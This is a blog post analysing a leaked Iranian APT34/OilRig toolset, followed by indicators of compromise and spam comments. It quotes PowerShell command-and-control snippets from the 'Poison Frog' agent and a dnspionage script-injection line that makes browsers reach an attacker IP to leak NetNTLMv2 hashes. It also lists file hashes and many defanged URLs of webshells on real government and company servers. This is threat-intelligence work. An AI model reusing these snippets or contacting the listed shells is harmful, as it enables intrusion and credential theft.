APT34 / OILRIG Leak, Quick Analysis

Few weeks ago a group of Iranian hackers called "Lab Dookhtegan" started leaking information about the operations of APT34 / OILRIG which supposedly would be the Iranian Ministry of Intelligence. The leaks started on March 26 when Dookhtegan started dropping archive containing source code on Telegram. The initial leak has recieved low coverrage so far and the Telegram group where the leak first appeard only has about 30 members. It is unclear who the leaker(s) is/are.
This article is a quick overview of the leak and will contain some IOC.
Pieces of code presented in this article are available on my Github page.

Please take the information in this blog post with a grain of salt. I'm analyzing the content of the leaked material, not doing attribution. This could aswell be a disinformation campaign and not APT34 at all.

telegram




The first leak is dubbed "Poison Frog" and contains two parts:
  • A server side module which is the c2 made in node.js
  • An agent part which is the payload in powershell.
The agent part contains 2 big chunks of base64 which are loaded with powershell. For me this seems to be a first stage payload. It fetches a configuration file from myleftheart.com (which is down now), creates a bunch of folders in C:\Users\Public\Public and also drops the two other payloads there. It also creates 2 scheduled task, one has administrator and one has a normal user, these tasks will run the two dropped powershell scripts; dUpdater.ps1 and hUpdater.ps every 10 minutes.




Now from these 2 payloads it's clear to see it can recieve and send files. It's seems the actor was also using a proxy:

 $u = "http://" + $HHA + ":" + $KKA;
 $MMA = new-object System.Net.WebProxy($u, $true);
 $NNA = new-object System.Net.NetworkCredential($IIA, $JJA, $LLA)
 $MMA.credentials = $NNA

This function is returning a subdomain for the myleftheart.com domain:

$CCA = "myleftheart.com";
$DDA = get-wmiobject Win32_ComputerSystemProduct  | Select-Object -ExpandProperty UUID | %{ "atag12" + $_.replace('-','') }| %{$_ + "1234567890"} | %{$_.substring(0,10)}

function EEA ($FFA, $GGA, $HHA, $IIA, $JJA)
{
 $KKA = -join ((48 .. 57)+(65 .. 70) | Get-Random  -Count (%{ Get-Random -InputObject (1 .. 7) }) | %{ [char]$_ });
 $LLA = Get-Random -InputObject (0 .. 9) -Count 2;
 $MMA = $DDA.Insert(($LLA[1]), $GGA).Insert($LLA[0], $FFA);
 write-host $DDA;
 if ($JJA -eq "s")

 { Print "$($MMA)$($KKA)A$($LLA[0])$($LLA[1])7.$HHA.$IIA.$CCA";}
 else 
 { Print "$($MMA)$($KKA)A$($LLA[0])$($LLA[1])7.$($CCA)";}
}


The result is "atag1273EC" from which the last part is random, it is later appended to myleftheart.com and is also the name of the folder created on the victim's machine.

Note that these samples were first seen on VirusTotal today after I uploaded them and only 2 antivirus detected them as malicious:




Unfortunately the server part is missing css files & other important files so it's not possible to run it properly like that. But opening the raw panel file gives an idea of it's capabilities:


On to the next one...
A big part of the leak is a rather big amount of ASP Webshell, dubbed "HighShell" and "HyperShell", there are quite some variants of these included.
The HyperShell is more than 30k lines of code... In order to see the shell you need to have a cookie named "p" with the right password. Unfortunately the leaker has stripped all of the most meaningful passwords and replaced them with "Th!sN0tF0rFAN".

As you can see on the screenshot below, the cookie is compared to te string "pp" which is the result of base64(sha256(Bytes(cookie+salt)))




At the time of writting this article it seems that 2 ASP webshells are still online:
hxxps://webmail.sstc.com.sa/owa/auth/logout.aspx
hxxps://mail.adac.ae/owa/auth/RedirOutlookService.aspx/

Another dirty one is called "dnspionage". It comes with a guide and install script to help the operator. It is separated in 2 parts;

icap.py which is an ICAP server that seems to be able to recieve all kind of data like credentials, cookies...
What is making me curious is this line:

script = ';$(document).ready(function(){$(\'<img src="file://[ip]/resource/logo.jpg"><img src="http://WPAD/avatar.jpg">\');});'

I think the [ip] has to be replaced by the attacker IP, then when this is injected in a victim's browser as an image, it will trigger Windows to go over file://ip and the attacker will be able to steal NetNTLMv2 hashes.

"TL;DR: Every NT-based operating system comes with a near-ideal LLMNR/NBT-NS poisoning setup baked in, unless an administrator configures WPAD using step 1 or 2. An attacker who responds to the multicast/broadcast request will be able to force the client to authenticate to the attacker’s machine using NTLM, and execute a MitM attack."

Moreover, assuming the attacker has gained control of the proxy, he could make his server answer to DNS A request for WPAD then make his server answer for get requests with an image that is actually a PAC file.

Fun fact; this server answer with a header which has a timedelta of 3000 days, meaning this will basically be cached by your browser and stay there for years if you don't clean your cache...


The second part is dns.py which also has its javascript version dnsd.js.
It seems to be a DNS hijacker, which is not surprising as APT34 is known for DNS Hijacking attacks. It runs on UDP port 53 and when it recieves a request it will check if the domain is in his config file and "override" the response whith whatever IP the attacker has set. So basically this will gives the attacker the ability to send victims who are using that dns to his own malicious server.

The other files in this leak contains a lot of private keys and credentials from users but also DA (Domain Admin) credentials for a number of domains


On a funnier note, it seems that some of the target that the group breached were not big fans of password policies:


Note that the leak contains 2 additional folders dubbed "MinionProject" and "FoxPanel222". They seem to be again client/server applications. They both contain a panel and binaries but I haven't analyzed them yet.
The leaker also provided other panel screenshots (which seems to be from yet another panel):




VoilĂ , that was definitely not a full analysis but I just wanted to write something quick, and it's also my first blogpost here so be indulgent (:

BTW Florian who writes Yara rules faster than his shadow already wrote one if you need:

IOC:

© Poison frog Changed by Poison Frogs Team
myleftheart.com
C:\Users\Public\Public\atag[0-9]{4}[A-Z]{2}
C:\Users\Public\Public\dUpdater.ps1
C:\Users\Public\Public\hUpdated.ps1
C:\Users\Public\Public\UpdateTask.vbs
27e03b98ae0f6f2650f378e9292384f1350f95ee4f3ac009e0113a8d9e2e14ed
b1d621091740e62c84fc8c62bcdad07873c8b61b83faba36097ef150fd6ec768
2943e69e6c34232dee3236ced38d41d378784a317eeaf6b90482014210fcd459
07e791d18ea8f2f7ede2962522626b43f28cb242873a7bd55fff4feb91299741
dd6d7af00ef4ca89a319a230cdd094275c3a1d365807fe5b34133324bdaa0229
3ca3a957c526eaeabcf17b0b2cd345c0fffab549adfdf04470b6983b87f7ec62
c9d5dc956841e000bfd8762e2f0b48b66c79b79500e894b4efa7fb9ba17e4e9e
a6a0fbfee08367046d3d26fb4b4cf7779f7fb6eaf7e60e1d9b6bf31c5be5b63e
fe1b011fe089969d960d2dce2a61020725a02e15dbc812ee6b6ecc6a98875392

Shells:
hxxps://202.183.235.31/owa/auth/signout.aspx
hxxps://202.183.235.4/owa/auth/signout.aspx
hxxps://122.146.71.136/owa/auth/error3.aspx
hxxps://59.124.43.229/owa/auth/error0.aspx
hxxps://202.134.62.169/owa/auth/signin.aspx
hxxps://202.164.27.206/owa/auth/signout.aspx
hxxps://213.14.218.51/owa/auth/logon.aspx
hxxps://88.255.182.69/owa/auth/getidtoken.aspx
hxxps://95.0.139.4/owa/auth/logon.aspx
hxxps://1.202.179.13/owa/auth/error1.aspx
hxxps://1.202.179.14/owa/auth/error1.aspx
hxxps://114.255.190.1/owa/auth/error1.aspx
hxxps://180.166.27.217/owa/auth/error3.aspx
hxxps://180.169.13.230/owa/auth/error1.aspx
hxxps://210.22.172.26/owa/auth/error1.aspx
hxxps://221.5.148.230/owa/auth/outlook.aspx
hxxps://222.178.70.8/owa/auth/outlook.aspx
hxxps://222.66.8.76/owa/auth/error1.aspx
hxxps://58.210.216.113/owa/auth/error1.aspx
hxxps://60.247.31.237/owa/auth/error3.aspx
hxxps://60.247.31.237/owa/auth/logoff.aspx
hxxps://202.104.127.218/owa/auth/error1.aspx
hxxps://202.104.127.218/owa/auth/exppw.aspx
hxxps://132.68.32.165/owa/auth/logout.aspx
hxxps://132.68.32.165/owa/auth/signout.aspx
hxxps://209.88.89.35/owa/auth/logout.aspx
hxxps://114.198.235.22/owa/auth/login.aspx
hxxps://114.198.237.3/owa/auth/login.aspx
hxxps://185.10.115.199/owa/auth/logout.aspx
hxxps://195.88.204.17/owa/auth/logout.aspx
hxxps://46.235.95.125/owa/auth/signin.aspx
hxxps://51.211.184.170/owa/auth/owaauth.aspx
hxxps://91.195.89.155/owa/auth/signin.aspx
hxxps://82.178.124.59/owa/auth/gettokenid.aspx
hxxps://83.244.91.132/owa/auth/logon.aspx
hxxps://195.12.113.50/owa/auth/error3.aspx
hxxps://78.100.87.199/owa/auth/logon.aspx
hxxps://110.74.202.90/owa/auth/errorff.aspx
hxxps://211.238.138.68/owa/auth/error1.aspx
hxxps://168.63.221.220/owa/auth/error3.aspx
hxZps://213.189.82.221/owa/auth/errorff.aspx
hxxps://205.177.180.161/owa/auth/erroref.aspx
hxxps://77.42.251.125/owa/auth/logout.aspx
hxxps://202.175.114.11/owa/auth/error1.aspx
hxxps://202.175.31.141/owa/auth/error3.aspx
hxxps://213.131.83.73/owa/auth/error4.aspx
hxxps://187.174.201.179/owa/auth/error1.aspx
hxxps://200.33.162.13/owa/auth/error3.aspx
hxxps://202.70.34.68/owa/auth/error0.aspx
hxxps://202.70.34.68/owa/auth/error1.aspx
hxxps://197.253.14.10/owa/auth/logout.aspx
hxxps://41.203.90.221/owa/auth/logout.aspx
hxxp://www.abudhabiairport.ae/english/resources.aspx
hxxps://mailkw.agility.com/owa/auth/RedirSuiteService.aspx
hxxp://www.ajfd.gov.ae/_layouts/workpage.aspx
hxxps://mail.alfuttaim.ae/owa/auth/change_password.aspx
hxxps://mail.alraidah.com.sa/owa/auth/GetLoginToken.aspx
hxxp://www.alraidah.com.sa/_layouts/WrkSetlan.aspx
hxxps://webmail.alsalam.aero/owa/auth/EventClass.aspx
hxxps://webmail.bix.bh/owa/auth/Timeoutctl.aspx
hxxps://webmail.bix.bh/owa/auth/EventClass.aspx
hxxps://webmail.bix.bh/ecp/auth/EventClass.aspx
hxxps://webmail.citc.gov.sa/owa/auth/timeout.aspx
hxxps://mail.cma.org.sa/owa/auth/signin.aspx
hxxps://mail.dallah-hospital.com/owa/auth/getidtokens.aspx
hxxps://webmail.dha.gov.ae/owa/auth/outlookservice.aspx
hxxps://webmail.dnrd.ae/owa/auth/getidtoken.aspx
hxxp://dnrd.ae:8080/_layouts/WrkStatLog.aspx
hxxps://www.dns.jo/statistic.aspx
hxxps://webmail.dsc.gov.ae/owa/auth/outlooklogonservice.aspx
hxxps://e-albania.al/dptaktkonstatim.aspx
hxxps://owa.e-albania.al/owa/auth/outlookdn.aspx
hxxps://webmail.eminsco.com/owa/auth/outlookfilles.aspx
hxxps://webmail.eminsco.com/owa/auth/OutlookCName.aspx
hxxps://webmail.emiratesid.ae/owa/auth/RedirSuiteService.aspx
hxxps://mailarchive.emiratesid.ae/EnterpriseVault/js/jquery.aspx
hxxps://webmail.emiratesid.ae/owa/auth/handlerservice.aspx
hxxp://staging.forus.jo/_layouts/explainedit.aspx
hxxps://government.ae/tax.aspx
hxxps://formerst.gulfair.com/GFSTMSSSPR/webform.aspx
hxxps://webmail.ictfund.gov.ae/owa/auth/owaauth.aspx
hxxps://jaf.mil.jo/ShowContents.aspx
hxxp://www.marubi.gov.al/aspx/viewpercthesaurus.aspx
hxxps://mail.mindware.ae/owa/auth/outlooktoken.aspx
hxxps://mail.mis.com.sa/owa/auth/Redirect.aspx
hxxps://webmail.moe.gov.sa/owa/auth/redireservice.aspx
hxxps://webmail.moe.gov.sa/owa/auth/redirectcache.aspx
hxxps://gis.moei.gov.ae/petrol.aspx
hxxps://gis.moenr.gov.ae/petrol.aspx
hxxps://m.murasalaty.moenr.gov.ae/signproces.aspx
hxxps://mail.mofa.gov.iq/owa/auth/RedirSuiteService.aspx
hxxp://ictinfo.moict.gov.jo/DI7Web/libraries/aspx/RegStructures.aspx
hxxp://www.mpwh.gov.jo/_layouts/CreateAdAccounts.aspx
hxxps://mail.mygov.ae/owa/auth/owalogin.aspx
hxxps://ksa.olayan.net/owa/auth/signin.aspx
hxxps://mail.omantourism.gov.om/owa/auth/GetTokenId.aspx
hxxps://email.omnix-group.com/owa/auth/signon.aspx
hxxps://mail.orange-jtg.jo/OWA/auth/signin.aspx
hxxp://fwx1.petra.gov.jo/SEDCOWebServer/global.aspx
hxxp://fwx1.petranews.gov.jo/SEDCOWebServer/content/rtl/QualityControl.aspx
hxxps://webmail.presflt.ae/owa/auth/logontimeout.aspx
hxxps://webmail.qchem.com/OWA/auth/RedirectCache.aspx
hxxps://meet.saudiairlines.com/ClientResourceHandler.aspx
hxxps://mail.soc.mil.ae/owa/auth/expirepw.aspx
hxxps://email.ssc.gov.jo/owa/auth/signin.aspx
hxxps://mail.sts.com.jo/owa/auth/signout.aspx
hxxp://www.sts.com.jo/_layouts/15/moveresults.aspx
hxxps://mail.tameen.ae/owa/auth/outlooklogon.aspx
hxxps://webmail.tra.gov.ae/owa/auth/outlookdn.aspx
hxxp://bulksms.umniah.com/gmgweb/MSGTypesValid.aspx
hxxps://evserver.umniah.com/index.aspx
hxxps://email.umniah.com/owa/auth/redirSuite.aspx
hxxps://webmail.gov.jo/owa/auth/getidtokens.aspx
hxxps://www.tra.gov.ae/signin.aspx
hxxps://www.zakatfund.gov.ae/zfp/web/tofollowup.aspx
hxxps://mail.zayed.org.ae/owa/auth/espw.aspx
hxxps://mail.primus.com.jo/owa/auth/getidtoken.aspx

Comments

  1. Fantastic post.

    Really enjoyed reading it and it held my attention all the way through! Keep it up.

    Read my Latest Post

    ReplyDelete
  2. Good day !!
    We are Christian Organization formed to help people in need of help,such as
    financial assistance, Do you need a loan to pay your bills? Do you need
    Personal Business Car or Student loans? Need a loan for various other
    purposes? If yes contact us today.

    Please these is for serious minded and God fearing People Only.

    Email: jacksonwaltonloancompany@gmail.com

    Text or call: +1-205-5882-592.

    Address is 68 Fremont Ave Penrose CO, 81240.

    Website: jacksonwaltonloancompany.blogspot.com

    ReplyDelete
  3. This site is very useful for all and Thanks to share with us Because you blog is very Knowledgeable and Informative I shared your blog with my friend. Keep posting and sharing and I found some site like you. This site help in technical. Thank You.

    Avast Login
    garmin.com/express
    avg.com/retail
    bullguard login
    mcafee.com/activate

    ReplyDelete
  4. Office login – Office is great platform to manage data like of any kind in the form of text,images,videos,infographics,etc. You can save your data with office files such as excel,word,powerpoint,etc . Access all of these items online by doing Office login .For this you have need a microsoft account and its detail. Valid user name and password. This is the superb facility which you can enjoy anywhere.


    http://officelogin.org
    http://bullguardlogin.com
    http://turbotax-login.us
    http://www.mcafeeactivatee.uk
    http://norton-login.org
    http://webrootlogin.org/
    webroot.com/safe
    canon.com/ijsetup

    ReplyDelete
  5. Thank you for sharing the information, i have got the best information. quick student loans

    ReplyDelete
  6. Thanks for sharing a useful information with us. If someone wants to know about Safety Softwares and Occupational health and Safety Software I think this is the right place for you.

    ReplyDelete
  7. Bullguard Login is a superb web technology which allow you to access all of your database like as product,services,etc. You can activate your bullguard antiviurs within minute ,can renew your subscription,change your password. And if you are new to Bullguard , so can create new account.
    Whenever is there any trouble with your bullguard. So must call to Support expert/ executive.

    Bullguard Login
    Office Login
    Mcafee Login
    AVG Login
    Norton Login
    webroot login
    webroot.com/safe
    Turbotax Login

    ReplyDelete
  8. Thanks for sharing, its great content, Here some information Regarding Printer Want to setup HP Envy 5055 wireless? Is an effortless process that won’t take much of your time Hardware Setup: Firstly, remove the printer from its box, then place it on a clean surface.Visit 123.hp.com/setup For more Details

    ReplyDelete
  9. Besides, you can avail a maximum of 11 email addresses which includes one master email account and 10 sub accounts. In short, BT Mail guarantees the best in class, sophisticated and user friendly service.
    BT Mail

    ReplyDelete
  10. you blog is looking very great and awesome,wow,
    also follow this.Bullguard Login

    ReplyDelete
  11. Norton.com/setup - Instant Norton Setup at electronic network.norton.com/setup. merely Enter Norton Setup Product Key and acquire Started with Norton in some simple Steps.Norton AntiVirus may be a sophisticated level antivirus and anti-malware software system package. Norton.com/setup is meant and marketed by Symantec Corporation since 1991. it's associate industry-leading software system package acknowledged for extending real time protection to your computers.

    https://nortoncomsetup55.blogspot.com/2019/11/webroot.html

    norton.com/setup

    ReplyDelete
  12. Thank you for sharing this genuine blogspot with us. I like your post and now I am gone share it to my profile of facebook.
    Garmin Express

    ReplyDelete
  13. Very great post you done. I like your post and really way of your writing is great and nice. Have a nice day and also know of me > AVG Login. I hope you will follow this content to know more about the industry .

    ReplyDelete
  14. Do you require HP printer setup for your mac operating system? Is your printer driver not suitable for macOS? Then visit the 123.hp.com/setup to get the software and driver for better functioning of your printer. You can also call our expert HP support team for services.

    ReplyDelete
  15. Canon Printer Offline issues can also prevail when your printer gets disconnected from your computer or the network you are using.
    Canon Printer Offline

    ReplyDelete
  16. Thanks to admin because you are sharing with us Knowledge. Your Site is very helpful and informative site. I have some site like you and related your site. Who wants to get more knowladge check it below Thank you
    Avast Login
    garmin.com/express
    avg.com/retail
    bullguard login
    mcafee.com/activate

    ReplyDelete
  17. Very good blog on this topic and its appreciating really.Let know of me -> webroot.com/safe Thanks for sharing this amazing knowledge with us.

    ReplyDelete
  18. We support all types of HP printer troubleshooting and service. Just enter the model number of your printer in 123hp.com/setup to identify the software and drivers your printer requires. Download and install it in your mac and 'Run' the file. The process is easy however if you have any doubts or queries regarding HP printers contact us.

    ReplyDelete
  19. Get the compatible software by navigating to the 123.hp.com/setup web page!

    ReplyDelete
  20. Very good blog on this topic and its appreciating really.Let know of me -> AVG login Thanks for sharing this amazing knowledge with us.

    ReplyDelete


  21. Thank you for sharing the information, i have got the best information. quick student loans

    ReplyDelete

Post a Comment

Popular Posts